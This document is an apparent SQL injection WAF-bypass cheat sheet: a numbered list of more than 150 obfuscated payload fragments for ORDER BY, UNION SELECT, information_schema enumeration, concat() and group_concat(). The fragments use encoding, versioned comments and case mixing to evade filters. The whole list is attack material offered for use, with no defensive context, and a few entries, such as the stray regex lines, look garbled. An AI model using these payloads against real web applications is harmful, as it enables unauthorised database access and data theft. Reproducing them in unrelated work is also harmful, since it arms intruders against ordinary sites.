b w4f $q1

1. [~] order by [~]
2.  
3. /**/ORDER/**/BY/**/
4. /*!order*/+/*!by*/
5. /*!ORDER BY*/
6. /*!50000ORDER BY*/
7. /*!50000ORDER*//**//*!50000BY*/
8. /*!12345ORDER*/+/*!BY*/
9.  
10. [~] UNION select [~]
11.  
12. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
13. %55nion(%53elect 1,2,3)-- -
14. +union+distinct+select+
15. +union+distinctROW+select+
16. /**//*!12345UNION SELECT*//**/
17. /**//*!50000UNION SELECT*//**/
18. /**/UNION/**//*!50000SELECT*//**/
19. /*!50000UniON SeLeCt*/
20. union /*!50000%53elect*/
21. +#uNiOn+#sEleCt
22. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
23. /*!%55NiOn*/ /*!%53eLEct*/
24. /*!u%6eion*/ /*!se%6cect*/
25. +un/**/ion+se/**/lect
26. uni%0bon+se%0blect
27. %2f**%2funion%2f**%2fselect
28. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
29. REVERSE(noinu)+REVERSE(tceles)
30. /*--*/union/*--*/select/*--*/
31. union (/*!/**/ SeleCT */ 1,2,3)
32. /*!union*/+/*!select*/
33. union+/*!select*/
34. /**/union/**/select/**/
35. /**/uNIon/**/sEleCt/**/
36. +%2F**/+Union/*!select*/
37. /**//*!union*//**//*!select*//**/
38. /*!uNIOn*/ /*!SelECt*/
39. +union+distinct+select+
40. +union+distinctROW+select+
41. uNiOn aLl sElEcT
42. UNIunionON+SELselectECT
43. /**/union/*!50000select*//**/
44. 0%a0union%a0select%09
45. %0Aunion%0Aselect%0A
46. %55nion/**/%53elect
47. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
48. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
49. %0A%09UNION%0CSELECT%10NULL%
50. /*!union*//*--*//*!all*//*--*//*!select*/
51. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
52. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
53. +UnIoN/*&a=*/SeLeCT/*&a=*/
54. union+sel%0bect
55. +uni*on+sel*ect+
56. +#1q%0Aunion all#qa%0A#%0Aselect
57. union(select (1),(2),(3),(4),(5))
58. UNION(SELECT(column)FROM(table))
59. %23xyz%0AUnIOn%23xyz%0ASeLecT+
60. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
61. union(select(1),2,3)
62. union (select 1111,2222,3333)
63. uNioN (/*!/**/ SeleCT */ 11)
64. union (select 1111,2222,3333)
65. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
66. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
67. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
68. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
69. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
70. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
71. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
72. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
73. /union\sselect/g
74. /union\s+select/i
75. /*!UnIoN*/SeLeCT
76. +UnIoN/*&a=*/SeLeCT/*&a=*/
77. +uni>on+sel>ect+
78. +(UnIoN)+(SelECT)+
79. +(UnI)(oN)+(SeL)(EcT)
80. +’UnI”On’+'SeL”ECT’
81. +uni on+sel ect+
82. +/*!UnIoN*/+/*!SeLeCt*/+
83. /*!u%6eion*/ /*!se%6cect*/
84. uni%20union%20/*!select*/%20
85. union%23aa%0Aselect
86. /**/union/*!50000select*/
87. /^.*union.*$/ /^.*select.*$/
88. /*union*/union/*select*/select+
89. /*uni X on*/union/*sel X ect*/
90. +un/**/ion+sel/**/ect+
91. +UnIOn%0d%0aSeleCt%0d%0a
92. UNION/*&test=1*/SELECT/*&pwn=2*/
93. un?<ion sel="">+un/**/ion+se/**/lect+
94. +UNunionION+SEselectLECT+
95. +uni%0bon+se%0blect+
96. %252f%252a*/union%252f%252a /select%252f%252a*/
97. /%2A%2A/union/%2A%2A/select/%2A%2A/
98. %2f**%2funion%2f**%2fselect%2f**%2f
99. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
100. /*!UnIoN*/SeLecT+
101.  
102. [~] information_schema.tables [~]
103.  
104. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
105. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
106. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
107. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
108. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
109. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
110.  
111. [~] concat() [~]
112.  
113. CoNcAt()
114. concat()
115. CON%08CAT()
116. CoNcAt()
117. %0AcOnCat()
118. /**//*!12345cOnCat*/
119. /*!50000cOnCat*/(/*!*/)
120. unhex(hex(concat(table_name)))
121. unhex(hex(/*!12345concat*/(table_name)))
122. unhex(hex(/*!50000concat*/(table_name)))
123.  
124. [~] group_concat() [~]
125.  
126. /*!group_concat*/()
127. gRoUp_cOnCAt()
128. group_concat(/*!*/)
129. group_concat(/*!12345table_name*/)
130. group_concat(/*!50000table_name*/)
131. /*!group_concat*/(/*!12345table_name*/)
132. /*!group_concat*/(/*!50000table_name*/)
133. /*!12345group_concat*/(/*!12345table_name*/)
134. /*!50000group_concat*/(/*!50000table_name*/)
135. /*!GrOuP_ConCaT*/()
136. /*!12345GroUP_ConCat*/()
137. /*!50000gRouP_cOnCaT*/()
138. /*!50000Gr%6fuP_c%6fnCAT*/()
139. unhex(hex(group_concat(table_name)))
140. unhex(hex(/*!group_concat*/(/*!table_name*/)))
141. unhex(hex(/*!12345group_concat*/(table_name)))
142. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
143. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
144. unhex(hex(/*!50000group_concat*/(table_name)))
145. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
146. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
147. convert(group_concat(table_name)+using+ascii)
148. convert(group_concat(/*!table_name*/)+using+ascii)
149. convert(group_concat(/*!12345table_name*/)+using+ascii)
150. convert(group_concat(/*!50000table_name*/)+using+ascii)
151. CONVERT(group_concat(table_name)+USING+latin1)
152. CONVERT(group_concat(table_name)+USING+latin2)
153. CONVERT(group_concat(table_name)+USING+latin3)
154. CONVERT(group_concat(table_name)+USING+latin4)
155. CONVERT(group_concat(table_name)+USING+latin5)